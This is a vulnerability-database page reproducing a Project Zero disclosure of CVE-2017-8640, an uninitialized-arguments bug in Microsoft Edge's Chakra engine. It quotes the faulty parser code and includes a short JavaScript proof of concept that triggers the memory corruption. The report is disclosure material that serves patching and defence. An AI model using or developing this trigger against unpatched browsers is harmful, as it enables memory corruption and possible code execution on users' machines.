Microsoft Edge Chakra Uninitialized Arguments
🗓️ 17 Aug 2017 00:00:00Reported by Google Security ResearchType
packetstorm🔗 packetstormsecurity.com👁 43 Views
| Reporter | Title | Published | Views | Family All 45 |
|---|---|---|---|---|
| Microsoft Edge Chakra Uninitialized Arguments Exploit | 17 Aug 201700:00 | – | zdt | |
| The vulnerability in the JavaScript kernel of Microsoft Edge allows a hacker to execute arbitrary code. | 25 Aug 201700:00 | – | bdu_fstec | |
| CVE-2017-8640 | 17 Aug 201700:00 | – | circl | |
| Microsoft Windows Edge JavaScript Engine Remote Code Execution Vulnerability (CNVD-2017-20500) | 9 Aug 201700:00 | – | cnvd | |
| Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-8640) | 28 Aug 201700:00 | – | checkpoint_advisories | |
| CVE-2017-8640 | 8 Aug 201721:00 | – | cve | |
| CVE-2017-8640 | 8 Aug 201721:00 | – | cvelist | |
| CVE-2017-8674 | 8 Aug 201721:00 | – | cvelist | |
| Microsoft Edge Chakra - Uninitialized Arguments (1) | 17 Aug 201700:00 | – | exploitdb | |
| August 8, 2017—KB4034658 (OS Build 14393.1593) | 8 Aug 201707:00 | – | mskb |
10
` Microsoft Edge: Chakra: Uninitialized arguments
CVE-2017-8640
Here's a snippet of "ParseVariableDeclaration" which is used for parsing declarations.
template<bool buildAST>
ParseNodePtr Parser::ParseVariableDeclaration(
tokens declarationType, charcount_t ichMin,
BOOL fAllowIn/* = TRUE*/,
BOOL* pfForInOk/* = nullptr*/,
BOOL singleDefOnly/* = FALSE*/,
BOOL allowInit/* = TRUE*/,
BOOL isTopVarParse/* = TRUE*/,
BOOL isFor/* = FALSE*/,
BOOL* nativeForOk /*= nullptr*/)
{
...
if (pid == wellKnownPropertyPids.arguments && m_currentNodeFunc)
{
// This var declaration may change the way an 'arguments' identifier in the function is resolved
if (declarationType == tkVAR)
{
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_varDeclaration;
}
else
{
if (GetCurrentBlockInfo()->pnodeBlock->sxBlock.blockType == Function)
{
// Only override arguments if we are at the function block level.
m_currentNodeFunc->grfpn |= PNodeFlags::fpnArguments_overriddenByDecl;
}
}
}
...
}
"m_currentNodeFunc" is only replaced when "buildAST" is true. So I think it's not supposed to use "m_currentNodeFunc" when "buildAST" is false. But the above code is using it regardless of "buildAST". So it may change a wrong function's "grfpn" flag. What I noticed is the "PNodeFlags::fpnArguments_overriddenByDecl" flag which makes the function's arguments uninitialized.
PoC:
function f() {
({a = () => {
let arguments;
}} = 1);
arguments.x;
}
f();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2017 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.69277